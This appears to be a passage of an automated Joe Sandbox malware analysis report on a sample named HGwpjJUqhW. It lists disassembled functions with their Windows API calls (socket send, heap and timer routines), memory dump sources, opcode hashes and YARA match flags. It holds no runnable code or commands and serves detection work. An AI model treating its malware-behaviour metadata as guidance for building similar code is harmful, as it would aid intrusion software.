                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135368981.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2880000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __calloc_crt__init_pointers__mtterm
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2478854527-0
                                                                                                                            • Opcode ID: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
                                                                                                                            • Instruction ID: 4182a7814d539edc21b882bb4220b3f1d3da7740e149097f32e872a01095ebb5
                                                                                                                            • Opcode Fuzzy Hash: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
                                                                                                                            • Instruction Fuzzy Hash: F6314C39840E35EAF721BF788D887293EE6EB49365B188516E518D7260FB32C481CF51
                                                                                                                            Function 034B39D3 Relevance: 6.1, APIs: 4, Instructions: 109COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __calloc_crt__init_pointers__mtterm
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2478854527-0
                                                                                                                            • Opcode ID: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                                                                            • Instruction ID: 32454a918306ec557f472477efa948bef49b1066cb4c16487b2980835b537449
                                                                                                                            • Opcode Fuzzy Hash: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                                                                            • Instruction Fuzzy Hash: 9F315D35D05720EEEB12EF768C98A97BFB4EB48760B24451BF9109A271E7308045DF64
                                                                                                                            Function 02C3E425 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C3E459
                                                                                                                            • __isleadbyte_l.LIBCMT ref: 02C3E48C
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 02C3E4BD
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 02C3E52B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058430110-0
                                                                                                                            • Opcode ID: 2e435683ad823ce04dfd59f14c4f7106de59bd14e8e47395d0011271a4764195
                                                                                                                            • Instruction ID: 431e47f6d17b4c4b964db38dd55374ec1a8a6d9644b231537a313773805baad9
                                                                                                                            • Opcode Fuzzy Hash: 2e435683ad823ce04dfd59f14c4f7106de59bd14e8e47395d0011271a4764195
                                                                                                                            • Instruction Fuzzy Hash: CB31C331A00255EFDF22DFA4C884ABA3BA5AF4D324F198DA9E4659B191E330DA40DF51
                                                                                                                            Function 0363A5C2 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0363A5F6
                                                                                                                            • __isleadbyte_l.LIBCMT ref: 0363A629
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 0363A65A
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 0363A6C8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058430110-0
                                                                                                                            • Opcode ID: 586bf94d9bf425192ddb87c307b910510ca2ce7a446bd273f3a16cfebad7ec0b
                                                                                                                            • Instruction ID: 155caf59e5ddb85b14a8f5abfe0f375cc88419ec08c66d5fa64e1a51d63cd5bd
                                                                                                                            • Opcode Fuzzy Hash: 586bf94d9bf425192ddb87c307b910510ca2ce7a446bd273f3a16cfebad7ec0b
                                                                                                                            • Instruction Fuzzy Hash: 8331B031A00256EFDB20DFA4C994DBE7BB5BF03221F1985A9E4918B290D330D960EB50
                                                                                                                            Function 03628020 Relevance: 6.1, APIs: 4, Instructions: 91stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2425037729-0
                                                                                                                            • Opcode ID: 4b4dc806fbfcc7a2b344dc8dc66f1a869652c2732e871659fe6e5210f06bb019
                                                                                                                            • Instruction ID: 56ae6ae2da54d856c9f0d68a94f287ad5b99d8c830e7ea4b46fe952dca6c7e32
                                                                                                                            • Opcode Fuzzy Hash: 4b4dc806fbfcc7a2b344dc8dc66f1a869652c2732e871659fe6e5210f06bb019
                                                                                                                            • Instruction Fuzzy Hash: 9D210D76B006289BCB14DE59DC809BEB7A9EBC4750B2A806DED05C7701F7319D518AA0
                                                                                                                            Function 02C34380 Relevance: 6.1, APIs: 4, Instructions: 70networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(0000139F), ref: 02C343EC
                                                                                                                              • Part of subcall function 02C313A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 02C313CB
                                                                                                                              • Part of subcall function 02C34C50: HeapFree.KERNEL32(?,00000000,?,00000000,02C34E35,?,02C342C8,02C34E35,00000000,?,?,02C34E35,?), ref: 02C34C77
                                                                                                                            • SetLastError.KERNEL32(00000000,?), ref: 02C343D7
                                                                                                                            • SetLastError.KERNEL32(00000057), ref: 02C34401
                                                                                                                            • WSAGetLastError.WS2_32(?), ref: 02C34410
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$Heap$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1906775185-0
                                                                                                                            • Opcode ID: 1a1d72b7898fc110a862841a514041ddfc093da3d5bb732338660bf7fdbea67b
                                                                                                                            • Instruction ID: 4d493857a8477b12ee957656169c445df81bef32a60f8a43b912cbfe38cbf29e
                                                                                                                            • Opcode Fuzzy Hash: 1a1d72b7898fc110a862841a514041ddfc093da3d5bb732338660bf7fdbea67b
                                                                                                                            • Instruction Fuzzy Hash: DB11CA3BE0552C9B8721EE69F8446DFB7E8EFC4372B4409A6ED0DD7200D735991146D0
                                                                                                                            Function 03624380 Relevance: 6.1, APIs: 4, Instructions: 70networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetLastError.KERNEL32(0000139F), ref: 036243EC
                                                                                                                              • Part of subcall function 036213A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 036213CB
                                                                                                                              • Part of subcall function 036241E0: EnterCriticalSection.KERNEL32(03624FB5,03624E55,036242BE,00000000,?,?,03624E55,?,?,?,?,00000000,000000FF), ref: 036241E8
                                                                                                                              • Part of subcall function 036241E0: LeaveCriticalSection.KERNEL32(03624FB5,?,?,?,00000000,000000FF), ref: 036241F6
                                                                                                                              • Part of subcall function 03624C70: HeapFree.KERNEL32(?,00000000,?,00000000,03624E55,?,036242C8,03624E55,00000000,?,?,03624E55,?), ref: 03624C97
                                                                                                                            • SetLastError.KERNEL32(00000000,?), ref: 036243D7
                                                                                                                            • SetLastError.KERNEL32(00000057), ref: 03624401
                                                                                                                            • WSAGetLastError.WS2_32(?), ref: 03624410
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$CriticalHeapSection$AllocEnterFreeLeave
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2060118545-0
                                                                                                                            • Opcode ID: 0b8f9bcff18dc88dff2f9b231872290d2a62e4f4b52ac071df2aa7fb4ffdc4b7
                                                                                                                            • Instruction ID: d0c0cd64ff7031fe7ceeca91c8fda80f4caba382ab6dc6bbfedf12730686c72f
                                                                                                                            • Opcode Fuzzy Hash: 0b8f9bcff18dc88dff2f9b231872290d2a62e4f4b52ac071df2aa7fb4ffdc4b7
                                                                                                                            • Instruction Fuzzy Hash: 9D11EB3AA05528978710EF6AF4849DFBBA8EF85231B1905AAEC0CD7204DB3199014AD4
                                                                                                                            Function 0362DE70 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 0362DE93
                                                                                                                            • _free.LIBCMT ref: 0362DED5
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,0362DC95), ref: 0362DEFC
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0362DF03
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap_free$FreeProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1072109031-0
                                                                                                                            • Opcode ID: 9ce155e94c533ac3d93a6d6b6224bc583fba0862e8e6cd6b02ea1555d98038d8
                                                                                                                            • Instruction ID: 4e26e12471f0dd15a9e5209f7a0109e37f2361c489745e9622f26cfb2ac54e0f
                                                                                                                            • Opcode Fuzzy Hash: 9ce155e94c533ac3d93a6d6b6224bc583fba0862e8e6cd6b02ea1555d98038d8
                                                                                                                            • Instruction Fuzzy Hash: BB118B75600B109BD330DB64CD44B67B7EABB84B00F19881CE5AA8BB80D774F842CF91
                                                                                                                            Function 02C33BF0 Relevance: 6.1, APIs: 4, Instructions: 58networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WSAEventSelect.WS2_32(?,02C33ABB,00000023), ref: 02C33C02
                                                                                                                            • WSAGetLastError.WS2_32 ref: 02C33C0D
                                                                                                                            • send.WS2_32(?,00000000,00000000,00000000), ref: 02C33C58
                                                                                                                            • WSAGetLastError.WS2_32 ref: 02C33C63
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$EventSelectsend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 259408233-0
                                                                                                                            • Opcode ID: 4c77034ca22871937e6bf2c8610ff5bc8bba82f24ae98535499186ee48d719d2
                                                                                                                            • Instruction ID: b3b17176c0352bfc9c9ff7e036f9a213f1e7ca0ec6edde5ffdce29dbaca238dc
                                                                                                                            • Opcode Fuzzy Hash: 4c77034ca22871937e6bf2c8610ff5bc8bba82f24ae98535499186ee48d719d2
                                                                                                                            • Instruction Fuzzy Hash: 56115EB6A00B405BD3209F79EC88A57B6E9BBC8714F510F2DE657C3680D776E940DB90
                                                                                                                            Function 03623BF0 Relevance: 6.1, APIs: 4, Instructions: 58networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WSAEventSelect.WS2_32(?,03623ABB,00000023), ref: 03623C02
                                                                                                                            • WSAGetLastError.WS2_32 ref: 03623C0D
                                                                                                                            • send.WS2_32(?,00000000,00000000,00000000), ref: 03623C58
                                                                                                                            • WSAGetLastError.WS2_32 ref: 03623C63
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$EventSelectsend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 259408233-0
                                                                                                                            • Opcode ID: d894b0d7ae48dd9ecec09af819c3a6cc4c4ff1af2c222c9142c83440d1554100
                                                                                                                            • Instruction ID: 612a65e976bca07532c8e83b858ccae2d000c64a01669d13801a7ccce629882c
                                                                                                                            • Opcode Fuzzy Hash: d894b0d7ae48dd9ecec09af819c3a6cc4c4ff1af2c222c9142c83440d1554100
                                                                                                                            • Instruction Fuzzy Hash: 29118CBA700B109BD720EF79D988A57BBF9BB89710F225A2DF596C7780D734E4008B50
                                                                                                                            Function 02C3F361 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3016257755-0
                                                                                                                            • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                            • Instruction ID: de330f31e4b196aa62755f20f93fe08a351bbd0762d4de4191ec8a8522d6862b
                                                                                                                            • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                            • Instruction Fuzzy Hash: C9113D3644014AFBCF536E85DC51CEE3F22BF58358F498819FA5859430C336CAB1AB81
                                                                                                                            Function 0363BDEB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3016257755-0
                                                                                                                            • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                            • Instruction ID: bc0a9e8002dd91975f2754f38dfbf1fc8812bf68d2ba2cb05c6accfe1eb29122
                                                                                                                            • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                            • Instruction Fuzzy Hash: EF114C3600114EBBCF269E88CD15CEE3F67BF1A390B588459FB185A130C736C5B2AB95
                                                                                                                            Function 0288F338 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135368981.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2880000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3016257755-0
                                                                                                                            • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                            • Instruction ID: 6d595d1d5f919cb74844ab2beb272ef5c06662e265a015b22e6ae2a300a47d27
                                                                                                                            • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                            • Instruction Fuzzy Hash: DD112E3A04414EBBCF166E88CC158ED3F23BF28254F988915FE1899430D73AD571EB81
                                                                                                                            Function 034BB7AA Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138171023.00000000034A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_34a0000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3016257755-0
                                                                                                                            • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                            • Instruction ID: 3858a6d671877a0b3822bbf279b3f78a11ed0ff3ecc4c3974b72eec611ccb359
                                                                                                                            • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                            • Instruction Fuzzy Hash: 07114E7640018ABBCF129F85CC51CEE3F76FB18254F488416FA685D230D636C5B1ABA5
                                                                                                                            Function 036241E0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • EnterCriticalSection.KERNEL32(03624FB5,03624E55,036242BE,00000000,?,?,03624E55,?,?,?,?,00000000,000000FF), ref: 036241E8
                                                                                                                            • LeaveCriticalSection.KERNEL32(03624FB5,?,?,?,00000000,000000FF), ref: 036241F6
                                                                                                                            • LeaveCriticalSection.KERNEL32(03624FB5), ref: 03624257
                                                                                                                            • SetEvent.KERNEL32(8520468B), ref: 03624272
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3394196147-0
                                                                                                                            • Opcode ID: b16e0c19fab343199676a437b7e11917bb1535f806b0272dbd09a00d7e43b3e6
                                                                                                                            • Instruction ID: 41e41158fac776041073bb09f7c91bfe9b96c867619def7a6a23262d9ad25bb1
                                                                                                                            • Opcode Fuzzy Hash: b16e0c19fab343199676a437b7e11917bb1535f806b0272dbd09a00d7e43b3e6
                                                                                                                            • Instruction Fuzzy Hash: CE1118B4A01B059FD725CF76D694AD7BBE9BF48300B15896DE45E87614EB31E401CF04
                                                                                                                            Function 02C34AE0 Relevance: 6.0, APIs: 4, Instructions: 45timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM(00000001,?,00000001,?,02C33C4F,?,?,00000001), ref: 02C34AF5
                                                                                                                            • InterlockedIncrement.KERNEL32(00000001), ref: 02C34B04
                                                                                                                            • InterlockedIncrement.KERNEL32(00000001), ref: 02C34B11
                                                                                                                            • timeGetTime.WINMM(?,02C33C4F,?,?,00000001), ref: 02C34B28
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: IncrementInterlockedTimetime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 159728177-0
                                                                                                                            • Opcode ID: 81fb75c2a298afc63c53339e2698115b16d1168a8d6d62836f04a2627c0b4945
                                                                                                                            • Instruction ID: 16eb8ea077c11716b2d9eaee47221c9fcf037a7f4cc39251afd7345ef7f1d8ef
                                                                                                                            • Opcode Fuzzy Hash: 81fb75c2a298afc63c53339e2698115b16d1168a8d6d62836f04a2627c0b4945
                                                                                                                            • Instruction Fuzzy Hash: 8A01DAB5A007059FC720DFBAD880A8AFBF9AF58750740892EE549C7610E774E6448FE0
                                                                                                                            Function 03624B00 Relevance: 6.0, APIs: 4, Instructions: 45timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • timeGetTime.WINMM(00000001,?,00000001,?,03623C4F,?,?,00000001), ref: 03624B15
                                                                                                                            • InterlockedIncrement.KERNEL32(00000001), ref: 03624B24
                                                                                                                            • InterlockedIncrement.KERNEL32(00000001), ref: 03624B31
                                                                                                                            • timeGetTime.WINMM(?,03623C4F,?,?,00000001), ref: 03624B48
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: IncrementInterlockedTimetime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 159728177-0
                                                                                                                            • Opcode ID: 6cb338b8ea922fce5880986119e2b12cf72af785a07ac7d6732f95d359caf8a8
                                                                                                                            • Instruction ID: 868bc2e228f44e64c5577eabbb1afc45e0e2769651f44cebdf9654d3e79ee18e
                                                                                                                            • Opcode Fuzzy Hash: 6cb338b8ea922fce5880986119e2b12cf72af785a07ac7d6732f95d359caf8a8
                                                                                                                            • Instruction Fuzzy Hash: 9901C8B5A00B159FC720EF7AD88098AFBF8AF58650711892EE549C7710E774E5448FA4
                                                                                                                            Function 02C33660 Relevance: 6.0, APIs: 4, Instructions: 42timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02C33667
                                                                                                                            • _free.LIBCMT ref: 02C3369C
                                                                                                                              • Part of subcall function 02C36E49: HeapFree.KERNEL32(00000000,00000000,?,02C39900,00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F), ref: 02C36E5F
                                                                                                                              • Part of subcall function 02C36E49: GetLastError.KERNEL32(00000000,?,02C39900,00000000,?,02C39FB0,00000000,00000001,00000000,?,02C3C0CF,00000018,02C47C70,0000000C,02C3C15F,00000000), ref: 02C36E71
                                                                                                                            • _malloc.LIBCMT ref: 02C336D7
                                                                                                                            • _memset.LIBCMT ref: 02C336E5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
